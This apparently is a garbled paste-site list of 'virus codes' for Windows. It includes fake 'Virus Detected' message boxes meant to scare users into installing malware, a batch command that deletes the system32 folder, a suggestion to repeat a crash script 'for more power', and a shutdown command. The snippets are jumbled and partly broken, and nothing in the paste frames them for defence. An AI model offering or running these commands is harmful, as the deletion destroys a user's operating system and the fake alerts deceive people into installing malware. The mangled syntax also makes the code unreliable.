X=Msgbox('Virus Found On Your Computer',0+16,'Virus Detected') #9 Message Box - Normally used to say stuff like 'virus detected' and 'fix virus' wich leads user to install a virus or message displays while virus is running.
X=Msgbox('Wanna Fix Virus',0+16,'Fix off del c:\\windows\system 32 X=Msgbox('Virus Is Active',0+16,'Virus Alert') #8 extreme & nasty virus made by Shroomie
(you can copy and paste Start Crash over and over again for more power) #5 system 32 deleter off del c:\\windows\system 32 (extesion.bat) #2 simple shutdown command - not really a virus RAW Paste Data Virus codes | off (cmd wont show command) on (cmd will show command)